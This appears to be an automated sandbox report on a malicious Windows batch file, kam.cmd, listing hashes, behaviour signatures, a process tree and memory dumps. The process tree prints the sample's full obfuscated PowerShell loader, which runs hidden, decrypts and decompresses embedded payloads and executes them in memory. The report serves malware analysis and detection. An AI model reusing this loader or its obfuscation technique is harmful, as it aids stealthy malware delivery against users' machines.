Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    19-04-2024 07:38

General

  • Target

    google/kam.cmd

  • Size

    63KB

  • MD5

    8c278ad6dd06fbcd0a767e744b62c785

  • SHA1

    e30a7793d54f89e1a364e0fbe710686c43a7be88

  • SHA256

    7be0bbf4d2a43ff457f55453d03b1cd85b7541396f7823ae51003b271fa0b0bc

  • SHA512

    36721787b046e00e3d183e7d83cdb3263ae151fd080e57e331e0f10667d04fca5412092249920f6566d5d8a640ecb819539103e1606599095be0af7fe9fd18b2

  • SSDEEP

    1536:r5JAG4vBFdvhBqi69GQys/xQ+sNIh/tQW9odEd/cLl:jSBFthBqiyZQzNFW2Ll

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\google\kam.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:2192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\google\kam.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:2660
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\google\kam.cmd';$vsHK='IEHyinvoEHyikeEHyi'.Replace('EHyi', ''),'FrTbCNomTbCNBTbCNaseTbCN64TbCNStTbCNrTbCNiTbCNngTbCN'.Replace('TbCN', ''),'DecLWiromLWirprLWiresLWirsLWir'.Replace('LWir', ''),'EGsoAntrGsoAyPGsoAoiGsoAntGsoA'.Replace('GsoA', ''),'CCddPrCddPeatCddPeCddPDeCddPcrCddPyCddPpCddPtCddPoCddPrCddP'.Replace('CddP', ''),'EleyknqmeyknqnyknqtAtyknq'.Replace('yknq', ''),'RigKHeigKHadigKHLiigKHnigKHeigKHsigKH'.Replace('igKH', ''),'LoyPPNadyPPN'.Replace('yPPN', ''),'ScvpNplcvpNicvpNtcvpN'.Replace('cvpN', ''),'GVJoFeVJoFtCuVJoFrVJoFrenVJoFtPVJoFroVJoFcVJoFeVJoFsVJoFsVJoF'.Replace('VJoF', ''),'MapAReinMpAReodpAReupARelepARe'.Replace('pARe', ''),'TrPOEJaPOEJnsPOEJfPOEJoPOEJrmPOEJFiPOEJnPOEJalPOEJBPOEJloPOEJckPOEJ'.Replace('POEJ', ''),'CoBJvMpyBJvMToBJvM'.Replace('BJvM', ''),'ChNZxNanNZxNgNZxNeENZxNxNZxNtenNZxNsioNZxNnNZxN'.Replace('NZxN', '');powershell -w hidden;function NWhFr($gBdvJ){$ZqBKJ=[System.Security.Cryptography.Aes]::Create();$ZqBKJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZqBKJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZqBKJ.Key=[System.Convert]::($vsHK[1])('PjiHj+DTj3maw+urBkf9Nh81M9EC6ZbFd543+Tn5ybE=');$ZqBKJ.IV=[System.Convert]::($vsHK[1])('YcgYSr+goQk5oVoF0rwnDA==');$tqqey=$ZqBKJ.($vsHK[4])();$JyHFR=$tqqey.($vsHK[11])($gBdvJ,0,$gBdvJ.Length);$tqqey.Dispose();$ZqBKJ.Dispose();$JyHFR;}function daoWE($gBdvJ){$RzPzI=New-Object System.IO.MemoryStream(,$gBdvJ);$FsIer=New-Object System.IO.MemoryStream;$gxzOz=New-Object System.IO.Compression.GZipStream($RzPzI,[IO.Compression.CompressionMode]::($vsHK[2]));$gxzOz.($vsHK[12])($FsIer);$gxzOz.Dispose();$RzPzI.Dispose();$FsIer.Dispose();$FsIer.ToArray();}$neFXM=[System.IO.File]::($vsHK[6])([Console]::Title);$QFtfJ=daoWE (NWhFr ([Convert]::($vsHK[1])([System.Linq.Enumerable]::($vsHK[5])($neFXM, 5).Substring(2))));$vmyld=daoWE (NWhFr ([Convert]::($vsHK[1])([System.Linq.Enumerable]::($vsHK[5])($neFXM, 6).Substring(2))));[System.Reflection.Assembly]::($vsHK[7])([byte[]]$vmyld).($vsHK[3]).($vsHK[0])($null,$null);[System.Reflection.Assembly]::($vsHK[7])([byte[]]$QFtfJ).($vsHK[3]).($vsHK[0])($null,$null); "
            3⤵
              PID:1696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2748

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2748-4-0x000000001B620000-0x000000001B902000-memory.dmp
          Filesize

          2.9MB

        • memory/2748-5-0x0000000001F00000-0x0000000001F08000-memory.dmp
          Filesize

          32KB

        • memory/2748-6-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
          Filesize

          9.6MB

        • memory/2748-7-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-9-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-8-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-10-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
          Filesize

          9.6MB

        • memory/2748-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
          Filesize

          9.6MB

        • memory/2748-13-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-14-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-15-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB

        • memory/2748-16-0x0000000002CA0000-0x0000000002D20000-memory.dmp
          Filesize

          512KB